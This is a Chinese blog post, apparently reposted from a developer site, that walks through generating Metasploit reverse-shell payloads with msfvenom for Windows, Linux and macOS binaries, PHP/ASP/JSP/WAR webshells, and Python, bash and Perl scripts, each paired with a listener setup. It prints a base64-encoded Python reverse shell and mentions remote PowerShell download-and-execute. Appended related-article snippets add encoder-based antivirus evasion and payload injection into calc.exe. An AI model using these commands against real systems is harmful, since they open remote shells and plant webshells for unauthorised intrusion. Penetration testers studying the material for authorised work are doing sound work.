生成msf常用payload

MSFVenom生成Payload实战
最新推荐文章于 2025-10-13 10:24:14 发布
转载 最新推荐文章于 2025-10-13 10:24:14 发布 · 8.2k 阅读 · 21

msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。

在kali下可以使用如下命令列出MSFVenom可以生成的payload列表:

msfvenom -l

生成二进制文件

关于二进制文件,主要介绍适用于Windows、linux、mac操作系统的payload生成与利用。

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf

Mac
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address>LPORT=<Your Port to Connect On> -f macho > shell.macho
如何利用

针对这个部分就以Windows为例,使用上面的命令生成一个exe的payload,命令如下:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.128 LPORT=4444 -f exe > shell.exe

复制shell.exe到Windows机器,然后kali下开启msf使用如下命令监听4444端口:

msfconsole

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.88.128

set LPORT  4444

set ExitOnSession false

exploit -j -z
执行完之后在Windows下执行shell.exe,然后结果如图:

在这里既然使用到了在Windows下执行应用程序,我们就大概盘点一下在Windows执行应用程序的几种方式:

  • 双击运行

  • cmd下运行exe

  • 利用Powershell远程下载执行

  • 利用at或schtasks设置计划任务执行

  • 利用wmic远程命令执行

  • 其他的方式请各位补充


生成webshell脚本

在做web渗透的时候,经常会用到webshell,我们经常用的一句话用菜刀连接,如何使用MSFVenom生成一个可以用msf操作的webshell呢?

PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp

WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
如何利用

下面以php为例做一下测试,使用以下命令生成一个webshell:

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.88.128 LPORT=4444 -f raw > shell.php
在kali上使用msf执行下面的命令,监听端口4444:
msfconsole

use exploit/multi/handler

set PAYLOAD php/meterpreter_reverse_tcp

set LHOST 192.168.88.128

set LPORT  4444

set ExitOnSession false

exploit -j -z
将shell.php放在web目录下,使用浏览器访问,或者使用以下命令执行:
php shell.php

脚本shell

关于使用脚本反弹shell的方式,主要以python、bash、perl为例。

Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
如何使用

下面就以Python为例做一下测试,使用以下命令生成一个脚本:

msfvenom -p cmd/unix/reverse_python LHOST=192.168.88.128 LPORT=4444 -f raw > shell.py
在kali上使用msf执行下面的命令,监听端口4444:

msfconsole

use exploit/multi/handler

set PAYLOAD cmd/unix/reverse_python

set LHOST 192.168.88.128

set LPORT  4444

set ExitOnSession false

exploit -j -z
然后复制shell.py中的内容在linux命令行下执行,如下:
python -c "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zICAgICAgOyAgICBob3N0PSIxOTIuMTY4Ljg4LjEyOCIgICAgICA7ICAgIHBvcnQ9NDQ0NCAgICAgIDsgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICAgIHMuY29ubmVjdCgoaG9zdCxwb3J0KSkgICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKSAgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpLDEpICAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCksMikgICAgICA7ICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"
结果如图:


总结

本文的主要内容是关于使用msfvenom生成常用的反向连接的shell,msfvenom可以生成的shell很多,不可能一一列举,这里只是提一下,不好意思又给大家分享了一个水文,请大家凑活看看,有什么建议和意见请下方留言。


MsfpayloadGUI:msfpayloadmsfencode gui-开源
07-09
这个简单的软件是我尝试为带有 QT 库的 msfpayloadmsfencode 程序开发的 gui。
msfvenom生成payload参数讲解
afei001
03-21 995
metasploit更新后去除了msfencode和msfpayload,并推出了全新的生成器:msfvenom msfvenom参数讲解 root@kali:~# msfvenom -h MsfVenom - a Metasploit standalone payload generator. Also a replacement for msfpayload...
msf payload
weixin_34088838的博客
03-11 163
#clientmsfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.106 LPORT=9999 -e x86/shikata_ga_nai -b '\x00' -x /root/demo/calc.exe -f exe &gt; demo.exe #server:msfconsolemsf&gt; use exploit/m...
payload
最新发布
Flying_Fish_roe的博客
10-13 802
摘要: Payload是网络攻击中触发漏洞并实现攻击目的的关键数据或代码,如SQL注入中的恶意SQL语句。其特点包括能被目标系统解析执行并能达成攻击目的(如窃取数据)。攻击过程中,payload会从简单探测(如id=1')逐步升级为复杂指令(如写入webshell)。为绕过WAF检测,payload常通过Tamper脚本变形(如混淆大小写)。本质上,payload是攻击的“核心指令”,需适配目标系统并规避防御机制。
生成常用msf
weixin_34268310的博客
01-08 291
生成msf常用payload msf作为一款强大的漏洞检测工具,如何生成适用于msfpayload以及如何利用是使用msf的关键,今天就主要记录一下常用payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。 在kali下可以使用如下命令列出MSFVenom可以生成payload列表: msfvenom -l 生成二进...
Msfpayload
天元喜羊羊的博客
07-09 2250
http://www.offensive-security.com/metasploit-unleashed/Msfpayload msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellco
Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用
Alone hackers的博客
03-06 6387
Metasploit (MSF) 使用:包含基本使用,payload生成,后渗透模块使用。
msf常用payload
ITgougou_的博客
12-24 4168
msf作为一款强大的漏洞检测工具,如何生成适用于msfpayload以及如何利用是使用msf的关键,今天就主要记录一下常用payload以及如何使用。生成payload使用的工具是MSFVenom,下面看看他的帮助信息。 在kali下可以使用如下命令列出MSFVenom可以生成payload列表: msfvenom -l 生成二进制文件 关于二进制文件,主要介绍适用于Window...
msf生成payload大全
墨鱼菜鸡
09-10 398
目录 资源 一、payload 1.windwos 2.liunx 3.mac 4.android 5.Powershell 6.shellcode(windwos) 7.shellcode(liunx) 8.shellcode(mac) 二、反弹shell 1.python 2.bash 3.Perl 4.Lua 5.R...
msf生成payload并注入到可执行程序exe中
redwand的博客
07-22 5929
msfconsole下的generate与msfvomen命令实际是不同环境下的同一个命令,其功能基本相同,这里我们要学习的重点是使用-k -x 选项将payload注入到可以执行文件exe中,这项技能在实战中后渗透测试的可持久化中经常会被用到。
MSF基本使用(基本结构与payload演示)
`or 1 or 不正经の泡泡
03-19 6144
文章目录前言环境基本结构基本专业术语物理结构逻辑结构使用流程渗透基本流程 前言 试个水(Let’s see if we can pass it)最近做一个爬虫项目,手又痒了。 MSF 是一个非常主流的渗透框架,里面包含了相当多的渗透探测模块 环境 Kail 2020 VM 16 主机:Windows 10 基本要求: 严格遵守国家安全法律法规,会使用Linux。 基本结构 基本专业术语 在玩这个之前呢,我们还是需要去先了解一下一些基本的专业术语的 渗透攻击(Exploit) 渗透攻击是指由攻击者或者渗透测试
使用shellcode打造MSF免杀payload
Coisini的博客
06-21 2025
0x00 前言 经常有同学提及MSF payload的免杀问题,其实除了Veil之处,还有另一种比较轻巧的方案可以打造免杀的payload,那就是shellcode。 0x01 从哪里开始 shellcode是什么,可以去drops搜索学习,但这并不是本文的重点。因为MSF已经为我们提供了shellcode的生成功能,接下来我们就拿最常用payload:reverse_tcp来做测试吧!(其它...
【渗透测试笔记】之【MSF 生成payload
AA8j的博客
11-07 914
生成payload # 查看所有payloads show payloads # 查看windows可用(输完按两下回车) use payload/windows/ # 使用绑定端口payload msf5 > use payload/windows/shell_bind_tcp # 查看payload编码,里面可能含有“坏字符” msf5 payload(windows/shell_bind_tcp) > generate # 对坏字符编码(默认自动选择一个最合适的encoder,也可以手动指
创建Metasploit Payloads
一个码农的笔记
01-31 1465
Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give y
msfpayload的用法
weixin_34015860的博客
07-03 851
daniel@daniel-mint ~/msf/metasploit-framework $ ruby msfpayload windows/exec CMD=calc.exe C WARNING: Nokogiri was built against LibXML version 2.8.0, but has dynamically loaded 2.9.1 /* * window...
msf-Windows payload
zzzzzyx_的博客
05-23 404
msfconsole 启动metasploit 然后 windows系统 msfvenom -p windows/meterpreter/reverse_tcp LHOST= _你的IP地址_ LPORT= _你的木马的IP地址_ -f exe > muma.exe 就这么一个不算文章的烂文章 您们也就不要赏钱了 下面????????的是坑钱的 其实我是一个 12 岁的 球娃 ...
msf payload php,Metasploit(四)--Msfpayload命令
weixin_32304785的博客
03-11 602
msfpayload即将在2015年6月18日弃用,用msfvenmon替代msfpayload-hmsfpayload的帮助信息。msfpayload-l|grepwindowsmsfpayload-l|greplinuxmsfpayload-l|grepandriod列出某个平台的pyloadsmsfpayloadwindows/meterpreter/bind_t...
msfvenom制作payload
anan2175的博客
05-24 317
windows msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe mac msfvenom -a x86 --plat...
MSFconsole进阶】Payload(攻击载荷模块):payload分类、相关命令、使用方法
05-24 9947
【渗透工具】MSFconsole进阶:Payload(攻击载荷模块)
MSF ⽣成 Payload是什么
06-14
### Metasploit Framework (MSF) 生成 Payload 的方法 Metasploit Framework (MSF) 提供了强大的工具 `msfvenom` 来生成 Payload。以下是生成 Payload 的详细说明和使用示例。 #### 使用 `msfvenom` 生成 Payload `msfvenom` 是 MSF 中用于生成 Payload 的独立工具,可以生成多种格式的 Payload,例如可执行文件、脚本等。其基本语法如下: ```bash msfvenom -p <payload> LHOST=<local_host> LPORT=<local_port> -f <output_format> -o <output_file> ``` - `-p`: 指定 Payload 类型。 - `LHOST`: 设置监听地址(通常是攻击机的 IP 地址)。 - `LPORT`: 设置监听端口。 - `-f`: 指定输出格式(如 exe、raw、python、js 等)。 - `-o`: 指定输出文件路径。 #### 示例:生成 Windows 反向 TCP Payload 以下是一个生成 Windows 反向 TCP Payload 的具体示例[^4]: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=1122 -f exe > shell.exe ``` - `-p windows/meterpreter/reverse_tcp`: 使用反向 TCP Payload。 - `LHOST=192.168.1.1`: 设置监听地址为攻击机的 IP。 - `LPORT=1122`: 设置监听端口为 1122。 - `-f exe`: 输出格式为可执行文件。 - `> shell.exe`: 将生成Payload 保存为 `shell.exe` 文件。 #### 配置监听 生成 Payload 后,需要在攻击机上配置监听以接收目标机器的连接。可以使用以下命令启动监听器: ```bash use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.1.1 set LPORT 1122 exploit ``` - `use exploit/multi/handler`: 使用多平台监听模块。 - `set payload windows/meterpreter/reverse_tcp`: 设置与 Payload 匹配的 Payload 类型。 - `set LHOST` 和 `set LPORT`: 设置监听地址和端口。 - `exploit`: 启动监听。 #### 注意事项 - 确保 `LHOST` 和 `LPORT` 的值与生成 Payload 时一致。 - 如果目标系统是 64 位操作系统,可以选择 `windows/x64/meterpreter/reverse_tcp` Payload。 #### 其他常用选项 - `-e`: 指定编码器以避免 Payload 被安全软件检测。 - `-i`: 设置编码器迭代次数。 - `-b`: 指定需要避开的字符(如空字节)。 示例:使用编码器生成 Payload: ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=1122 -e x86/shikata_ga_nai -i 3 -f exe > encoded_shell.exe ``` - `-e x86/shikata_ga_nai`: 使用 Shikata Ga Nai 编码器。 - `-i 3`: 设置编码器迭代次数为 3。 ### 总结 通过 `msfvenom` 工具,可以灵活生成适用于不同场景的 Payload,并结合 MSF 的监听模块完成渗透测试任务。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值